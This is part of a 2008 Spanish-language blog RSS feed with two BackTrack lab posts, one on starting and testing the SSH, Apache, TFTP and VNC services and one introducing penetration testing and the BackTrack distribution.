		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos#comments</comments>
		<pubDate>Thu, 28 Aug 2008 16:14:25 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Servicios]]></category>
		<category><![CDATA[SSH]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[TFTP]]></category>
		<category><![CDATA[VMWare]]></category>
		<category><![CDATA[VNC]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=226</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">BackTrack incluye algunos servicios de red por defecto, entre ellos HTTPD, SSHD, TFTP, VNC SERVER, etc. Estos servicios pueden ser utilizados en diferentes situaciones en un Test de Penetración (conexión remota a un equipo, transferencia de archivos, etc).</p>
<p style="text-align: justify;"><strong>Objetivos del laboratorio:</strong></p>
<ol style="text-align: justify;">
<li>Familiarizarse con la suite de herramientas incluídas en BackTrack.</li>
<li>Cambiar la contrseña que viene por defecto en BackTrack.</li>
<li>Conocer los direferentes servicios disponibles en BackTrack (básicos).</li>
<li>Configurar y poner en marcha los servicios básicos de BackTrack.</li>
<li>Comprobar la disponibilidad de los servicios básicos de BackTrack.</li>
<li>Realizar pruebas de conexión a los servicios de BackTrack.</li>
</ol>
<p style="text-align: justify;"><span id="more-226"></span>Veamos como iniciar con backtrack</p>
<p style="text-align: justify;">Sistema de <a href="http://es.wikipedia.org/wiki/Booteo" target="_blank"><strong>booteo</strong></a> de BackTrack</p>
<p style="text-align: justify;"><a href="http://img125.imageshack.us/img125/1193/10lu0.jpg" target="_blank"><img src="http://img125.imageshack.us/img125/1193/10lu0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong>Termina de reconocer y configurar algunos de los dispositivos físicos, luego de cargar estos dispositivos nos ofrece una pantalla de bienvenida, con información de configuración, además de una pantalla de <a href="http://es.wikipedia.org/wiki/Login" target="_blank"><strong>login</strong></a>. La pantalla nos invita a configurar nuestro sistema con algunos comandos, después de logearnos como root.</p>
<p style="text-align: justify;"><a href="http://img223.imageshack.us/img223/7536/11od8.jpg" target="_blank"><img src="http://img223.imageshack.us/img223/7536/11od8.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong>Para logearnos en el sistema ingresamos:<br />
usuario: <strong>root</strong><br />
contraseña: <strong>toor</strong></p>
<p style="text-align: justify;"><a href="http://img204.imageshack.us/img204/2664/12oo4.jpg" target="_blank"><img src="http://img204.imageshack.us/img204/2664/12oo4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Si desde el comienzo seleccionamos la opción de acceso a la red mediante NAT (VMWare), podemos observar gracias al comando <a href="http://es.wikipedia.org/wiki/Ifconfig" target="_blank"><strong>ifconfig</strong></a> nuestras interfaces de red.</p>
<p style="text-align: justify;"><a href="http://img106.imageshack.us/img106/7615/13ab6.jpg" target="_blank"><img src="http://img106.imageshack.us/img106/7615/13ab6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Luego podemos configurar el entorno gráfico (xconf) y cargarlo mediante el comando <a href="http://es.tldp.org/FAQ/FAQ_Linux/Html/FAQ_Linux-6.html" target="_blank"><strong>startx<br />
</strong></a> ó Flux (según nuestras preferencias de uso)</p>
<p style="text-align: justify;"><a href="http://img130.imageshack.us/img130/4568/14jg6.jpg" target="_blank"><img src="http://img130.imageshack.us/img130/4568/14jg6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong>Entorno gráfico cargando.</p>
<p style="text-align: justify;"><a href="http://img230.imageshack.us/img230/7319/15bw9.jpg" target="_blank"><img src="http://img230.imageshack.us/img230/7319/15bw9.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong>BackTrack cargado como Live CD en su totalidad.</p>
<p style="text-align: justify;"><a href="http://img124.imageshack.us/img124/4858/31hm3.jpg" target="_blank"><img src="http://img124.imageshack.us/img124/4858/31hm3.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Es importante destacar que el éxito de BackTrack reside en la excelente organización y disposición por grupos de herramientas:</p>
<ol style="text-align: justify;">
<li>Recolección de información</li>
<li>Mapeo de red</li>
<li>Identificación de vulnerabilidades</li>
<li>Penetración / Explotación</li>
<li>Escalada de privilegios</li>
<li>Mantenimiento del acceso</li>
<li>Servicios de red inalámbrica</li>
<li>Telefonía sobre VoIP</li>
<li>Informática Forense</li>
<li>Ingeniería inversa</li>
</ol>
<p style="text-align: justify;">También  podemos ingresar a los diferentes grupos de herramientas desde la línea de comandos:</p>
<p style="text-align: justify;"><strong>cd /pentest/</strong></p>
<p style="text-align: justify;"><a href="http://img172.imageshack.us/img172/9676/75183728mt7.jpg"><img src="http://img172.imageshack.us/img172/9676/75183728mt7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Uno de los primero pasos a realizar debe ser el cambio de contraseña que viene por defecto en backtrack, para ello bastará con ejecutar la siguiente instrucción en la línea de comandos:</p>
<p style="text-align: justify;"><strong>passwd</strong></p>
<p style="text-align: justify;">y seguir las instrucciones para completar el cambio</p>
<p><a href="http://img165.imageshack.us/img165/9905/52389028kw9.jpg"><img src="http://img165.imageshack.us/img165/9905/52389028kw9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Veremos ahora como identificar y habilitar servicios básicos en backtrack</p>
<p style="text-align: justify;"><strong>SSH (Secure Shell)</strong></p>
<p style="text-align: justify;">Empecemos por generar y habilitar el servicio de conexiones seguras (SSHD &#8211; Secure Shell Daemon), para ello y desde la línea de comandos ejecutamos la siguiente sintáxis</p>
<p style="text-align: justify;"><strong>sshd-generate</strong></p>
<p><a href="http://img381.imageshack.us/img381/7827/80769068hf2.jpg"><img src="http://img381.imageshack.us/img381/7827/80769068hf2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Una vez generado nuestro servicio, iniciaremos el mismo como conexión segura:</p>
<p style="text-align: justify;"><strong>/usr/sbin/sshd</strong></p>
<p><a href="http://img136.imageshack.us/img136/6959/20870314mr8.jpg"><img src="http://img136.imageshack.us/img136/6959/20870314mr8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora, si deseamos comprobar la disponibilidad del servicio de conexiones seguras, basta con ejecutar el siguiente comando para mostrar las conexiones activas y a la escucha en nuestra máquina (para este caso solo consultamos para el puerto 22, puerto usado generalmente para este tipo de conexiones):</p>
<p style="text-align: justify;"><strong>netstat -ant|grep 22</strong></p>
<p><a href="http://img514.imageshack.us/img514/6458/99595389wj2.jpg"><img src="http://img514.imageshack.us/img514/6458/99595389wj2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Podemos hacer una prueba de conexión desde otro sistema, veamos:</p>
<p><a href="http://img257.imageshack.us/img257/2950/38574624hz7.jpg"><img src="http://img257.imageshack.us/img257/2950/38574624hz7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><strong>&#8212; Servidor Apache &#8212;<br />
</strong></p>
<p style="text-align: justify;">BackTrack incluye por defecto una instalación del servidor Web Apache, veamos como ponerlo en marcha.</p>
<p style="text-align: justify;"><strong>Nota:</strong> Cabe aclarar que la mayoría de estos servicios pueden ser ejecutados desde el menu incluído en K-Menú, Servicios. Solo estamos viendo otros métodos en caso de que lo queremos hacer o bien sea, más rápido, ó cuando no tengamos disponible el entorno gráfico.</p>
<p style="text-align: justify;">Pongamos en marcha el servicio de apache desde la línea de comandos:</p>
<p style="text-align: justify;"><strong>apachectl start</strong></p>
<p style="text-align: justify;">Y comprobemos la disponiblidad del servicio</p>
<p style="text-align: justify;"><strong>netstat -ant|grep 80</strong></p>
<p><a href="http://img165.imageshack.us/img165/148/99192940en1.jpg"><img src="http://img165.imageshack.us/img165/148/99192940en1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora desde un navegador Web</p>
<p><a href="http://img413.imageshack.us/img413/3131/52594955jp8.jpg"><img src="http://img413.imageshack.us/img413/3131/52594955jp8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Para detener el servicio solo basta ejecutar la instrucción stop.</p>
<p style="text-align: justify;"><strong>apachectl stop</strong></p>
<p><a href="http://img98.imageshack.us/img98/2964/85170941ku3.jpg"><img src="http://img98.imageshack.us/img98/2964/85170941ku3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><strong>&#8212; TFTP (Trivial File Transfer Protocol &#8211; Protocolo de transferencia de archivos trivial) &#8212;<br />
</strong></p>
<p style="text-align: justify;">Veamos como poner en marcha el servidor TFTP que incluye por defecto el S.O BackTrack.</p>
<p style="text-align: justify;">Desde la línea de comandos ejecutamos la siguiente instrucción:</p>
<p style="text-align: justify;"><strong>atftpd &#8211;daemon &#8211;port 69 /tap/</strong></p>
<p><a href="http://img222.imageshack.us/img222/2558/10pt0.jpg"><img src="http://img222.imageshack.us/img222/2558/10pt0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora comprobemos la disponiblidad del servicio</p>
<p style="text-align: justify;"><strong>netstat -anu|grep 69</strong></p>
<p><a href="http://img257.imageshack.us/img257/8765/11fd3.jpg"><img src="http://img257.imageshack.us/img257/8765/11fd3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Hagamos una prueba de transferencia de archivos</p>
<p><a href="http://img54.imageshack.us/img54/6685/14ih6.jpg"><img src="http://img54.imageshack.us/img54/6685/14ih6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><strong>&#8212; VNC &#8212;<br />
</strong></p>
<p style="text-align: justify;">Veamos como configurar y poner en marcha nuestro propio servicio de VNC en BackTrack, para ello ejecutamos la siguiente instrucción:</p>
<p style="text-align: justify;"><strong>vncserver</strong></p>
<p style="text-align: justify;">Solo tenemos que seguir las intrucciones en pantalla (definir contraseña de acceso)</p>
<p><a href="http://img165.imageshack.us/img165/2155/12eo7.jpg"><img src="http://img165.imageshack.us/img165/2155/12eo7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Verifiquemos que nuestra máquina realmente está a la escucha de nuevas conexiones, para ello ejecutamos la siguiente instrucción:</p>
<p style="text-align: justify;"><strong>netstat -ant|grep 590</strong></p>
<p><a href="http://img98.imageshack.us/img98/1725/13km7.jpg"><img src="http://img98.imageshack.us/img98/1725/13km7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora hagamos una prueba de conexión desde otra máquina</p>
<p><a href="http://img237.imageshack.us/img237/9662/vnc1wq0.jpg"><img src="http://img237.imageshack.us/img237/9662/vnc1wq0.th.jpg" alt="" /></a></p>
<p><a href="http://img185.imageshack.us/img185/9515/vnc2cq1.jpg"><img src="http://img185.imageshack.us/img185/9515/vnc2cq1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Aquí termina el laboratorio sobre habilitación, configuración y prueba de servicios básicos en BackTrack. Estos mismo servicios pueden ser habilitados de manera gráfica en el propio menú K de BackTrack, además pueden ser encontrados algunos otros instalados por defecto en el sistema, esta será la práctica para cada uno de los seguidores de los laboratorios, espero que sean enviadas las capturas de pantallas, además de los comentarios sobre el mismo.</p>
<p style="text-align: justify;">
<p style="text-align: justify;">
<p style="text-align: justify;"><strong>Palabras clave:</strong><a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank"><br />
Apache</a>, <a href="http://es.wikipedia.org/wiki/VNC" target="_blank">VNC</a>, <a href="http://es.wikipedia.org/wiki/TFTP" target="_blank">TFTP</a>, <a href="http://es.wikipedia.org/wiki/SSH" target="_blank">SSH</a>, <a href="http://www.kriptopolis.org/backtrack" target="_blank">BackTrack</a>, <a href="http://es.wikipedia.org/wiki/Arranque" target="_blank">Booteo</a>, <a href="http://es.wikipedia.org/wiki/NAT" target="_blank">NAT</a>, <a href="http://es.wikipedia.org/wiki/VMware" target="_blank">VMWare</a></p>
<p style="text-align: justify;"><strong>Nota:</strong><br />
Este nuevo recurso está basado en el sistema de entrenamiento ofrecido por los desarrolladores y colaboradores del proyecto BackTrack (Remote-Exploit) <a href="http://www.offensive-security.com/" target="_blank">Offensive-security.com</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Test de Penetración con BackTrack, Introducción</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-introduccion</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-introduccion#comments</comments>
		<pubDate>Wed, 20 Aug 2008 16:33:40 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Ataques]]></category>
		<category><![CDATA[Distribución]]></category>
		<category><![CDATA[Escaneo]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[LiveCD]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Sniffing]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=203</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Antes de comenzar con este nuevo recurso y que irá en paralelo con otros laboratorios en desarrollo (<a href="http://labs.dragonjar.org/category/hacking" target="_blank">Laboratorios- Hacking, Técnicas y contramedidas</a>, <a href="http://labs.dragonjar.org/category/hacktaller" target="_blank">DragoNLab-HackTaller</a> y <a href="http://labs.dragonjar.org/category/criptografia" target="_blank">Taller Técnicas Criptográficas</a>), es necesarios aclarar algunos conceptos sobre el mismo.<br />
No sería posible comenzar sin aclarar la finalidad de este laboratorio práctico, las herramientas necesarias y la terminología a utilizar.</p>
<p style="text-align: justify;">Comencemos entonces por definir los conceptos de <strong>Test de Penetración</strong> y <strong>BackTrack</strong>:</p>
<p style="text-align: justify;"><span id="more-203"></span><strong>Test de penetración:</strong><br />
Test de Penetración, también llamado a veces “hacking ético” es una evaluación activa de las medidas de seguridad de la información.<br />
En los entornos de red complejos actuales, la exposición potencial al riesgo es cada vez mayor y securizar los sistemas se convierten en un auténtico reto.<br />
A través del Test de Penetración es posible detectar el nivel de Seguridad Interna y Externa de los Sistemas de Información de la empresa, determinando el grado de acceso que tendría un atacante con intenciones maliciosas. Además, el servicio chequea las vulnerabilidades que pueden ser vistas y explotadas por individuos no autorizados, &#8220;crackers&#8221;, agentes de información, ladrones, antiguos empleados, competidores, etc.</p>
<p style="text-align: justify;"><strong>Los servicios de Test de Penetración permiten:</strong><br />
<strong>-</strong> Evaluar vulnerabilidades por medio de la identificación de debilidades de configuración que puedan ser explotadas.<br />
<strong>-</strong> Analizar y categorizar las debilidades explotables basadas en el impacto potencial y posibilidad de ocurrencia.<br />
<strong>-</strong> Proveer recomendaciones prioritizadas para mitigar y eliminar las debilidades.</p>
<p style="text-align: justify;">El Test de Penetración está dirigido a la búsqueda de agujeros de seguridad de forma focalizada en uno o varios recursos críticos, como puede ser el firewall o el servidor Web.</p>
<p style="text-align: justify;"><strong>BackTrack:</strong><br />
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.<br />
Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.<br />
WHAX es la evolución del Whoppix,(WhiteHat Knoppix) el cual pasó a basarse en SLAX en lugar de en Knoppix.<br />
Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.<br />
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org<br />
<a href="http://www.remote-exploit.org/backtrack.html" target="_blank"><strong>Web Oficial de BackTrack</strong></a></p>
<p style="text-align: justify;">Luego de tener claro las anteriores definiciones podemos entender que la finalidad de nuestro Laboratorio de Test de Penetración con BackTrack, será el ofrecer las técnicas, procesos y procedimientos necesarios para llevar a cabo un Test de Penetración haciendo uso de la Multi-Herramienta BackTrack.</p>
<p style="text-align: justify;">Esto conllevará entonces a aprender y prácticar con ejemplos claros, sobre el uso de esta máginifica distribución. Además de las metodologías necesarias en un Test de Penetración.</p>
<p style="text-align: justify;"><strong>Palabras clave:</strong> <a href="http://es.wikipedia.org/wiki/BackTrack" target="_blank">BackTrack</a>, <a href="http://elladodelmal.blogspot.com/2007/02/test-de-intrusion-i-de-vi.html" target="_blank">Test de Penetración</a>, <a href="http://es.wikipedia.org/wiki/Distribuci%C3%B3n_Linux" target="_blank">Distribución</a>, <a href="http://es.wikipedia.org/wiki/CD_aut%C3%B3nomo" target="_blank">LiveCD</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">scanner de puertos</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a>, <a href="http://es.wikipedia.org/wiki/Exploit" target="_blank">exploits</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-sniffing-i" target="_blank">sniffers</a>, <a href="http://www.microsoft.com/spain/empresas/legal/forensic.mspx" target="_blank">análisis forense</a>, <a href="http://es.wikipedia.org/wiki/Comunicaci%C3%B3n_inal%C3%A1mbrica" target="_blank">Wireless</a>.</p>
<p style="text-align: justify;">En el próximo Laboratorio, definiré los recursos necesarios y el contenido temático del Laboratorio.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-introduccion/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
	</channel>
</rss>

